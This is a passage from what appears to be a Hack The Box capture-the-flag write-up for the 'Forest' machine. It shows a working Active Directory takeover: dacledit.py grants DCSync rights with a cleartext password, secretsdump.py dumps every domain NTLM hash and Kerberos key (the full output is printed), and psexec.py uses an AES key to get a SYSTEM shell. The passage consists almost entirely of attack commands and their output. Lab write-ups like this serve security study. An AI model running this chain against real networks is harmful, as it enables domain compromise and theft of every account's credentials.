Impacket v0.9.25.dev1+20221216.150032.204c5b6b - Copyright 2021 SecureAuth Corporation

[-] Target principal not found in LDAP (htb.local)
```

Interesting. Perhaps we need the target SID. We can get that from Bloodhound, by clicking on the object: `S-1-5-21-3072663084-364016917-1341370565`  
We also need the `-inheritance` option.

```console
(venv) opcode@parrot$ dacledit.py -action write -rights DCSync -principal svc-alfresco -target-sid S-1-5-21-3072663084-364016917-1341370565 -dc-ip 10.10.10.161 htb.local/svc-alfresco:s3rvice -inheritance
Impacket v0.9.25.dev1+20221216.150032.204c5b6b - Copyright 2021 SecureAuth Corporation

[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20230724-195108.bak
[*] DACL modified successfully!
```

It worked!

Now, we can perform a DCSync using `secretsdump.py`:

```console
opcode@parrot$ secretsdump.py htb.local/svc-alfresco:s3rvice@forest.htb.local
Impacket v0.10.1.dev1+20230718.100545.fdbd2568 - Copyright 2022 Fortra

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
spotless:9602:aad3b435b51404eeaad3b435b51404ee:44c215b4ff368526c6ce2ccc76ba3ace:::
john:9603:aad3b435b51404eeaad3b435b51404ee:44c215b4ff368526c6ce2ccc76ba3ace:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:5b1cd79cec4713d0e4d08786534a469b:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
GLADOS$:9601:aad3b435b51404eeaad3b435b51404ee:bda2efe7dff87e07b4ab97ea7d12b746:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4
htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e
htb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e
htb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf
htb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd
htb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e
htb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e
htb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed
htb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983
htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91
htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f
htb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a
htb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c
htb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8
htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d
htb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81
htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6
htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5
htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a
htb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2
htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29
htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7
htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538
htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702
htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352
htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d
htb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701
htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd
htb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36
htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb
htb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c
htb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3
htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054
htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161
htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a
htb.local\sebastien:des-cbc-md5:702a3445e0d65b58
htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5
htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad
htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea
htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a
htb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f
htb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6
htb.local\andy:des-cbc-md5:a2ab5eef017fb9da
htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6
htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81
htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9
htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427
htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25
htb.local\santi:des-cbc-md5:4075ad528ab9e5fd
spotless:aes256-cts-hmac-sha1-96:6fa612a82f03d0c0710ba4b8755982d836e387d6ae19b54664892df2d47c8ac6
spotless:aes128-cts-hmac-sha1-96:c40f0d43f9e6a3bae77e464d3164acc0
spotless:des-cbc-md5:b9947616febc2a38
john:aes256-cts-hmac-sha1-96:44f1c5425ce6cca2608a6a878e210c9a7290affd848d169ebf6bb66803ba4562
john:aes128-cts-hmac-sha1-96:98feeffc17a68a9f475626c9f4c7aa70
john:des-cbc-md5:708f6725b349571f
FOREST$:aes256-cts-hmac-sha1-96:83d3acde44c1ab9662081a8299d03c0295d4d03cb575ca8852bd4f63b13c3693
FOREST$:aes128-cts-hmac-sha1-96:501ac8884a945936259cf6bd5a2ed15d
FOREST$:des-cbc-md5:c8132fbf73c71fa8
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
GLADOS$:aes256-cts-hmac-sha1-96:ea56e9c7425e2a289b65cca4be1dcb815abb65562ed18cfd2d25a664f44d46ad
GLADOS$:aes128-cts-hmac-sha1-96:fa73b0a9e8cf10b9b395dfff45937c4d
GLADOS$:des-cbc-md5:32a7dfc4a10df7dc
[*] Cleaning up... 
```

Now, we can use the kerberos AES key with `psexec.py` to get shell as system:

```console
opcode@parrot$ sudo ntpdate htb.local
opcode@parrot$ psexec.py -no-pass -aesKey b5880b186249a067a5f6b814a23ed375 htb.local/administrator@forest.htb.local 
Impacket v0.10.1.dev1+20230718.100545.fdbd2568 - Copyright 2022 Fortra

[-] CCache file is not found. Skipping...
[*] Requesting shares on forest.htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file QtCwFOkj.exe
[*] Opening SVCManager on forest.htb.local.....
[*] Creating service wBSr on forest.htb.local.....
[*] Starting service wBSr.....
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
[!] Press help for extra shell commands
[-] CCache file is not found. Skipping...
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```
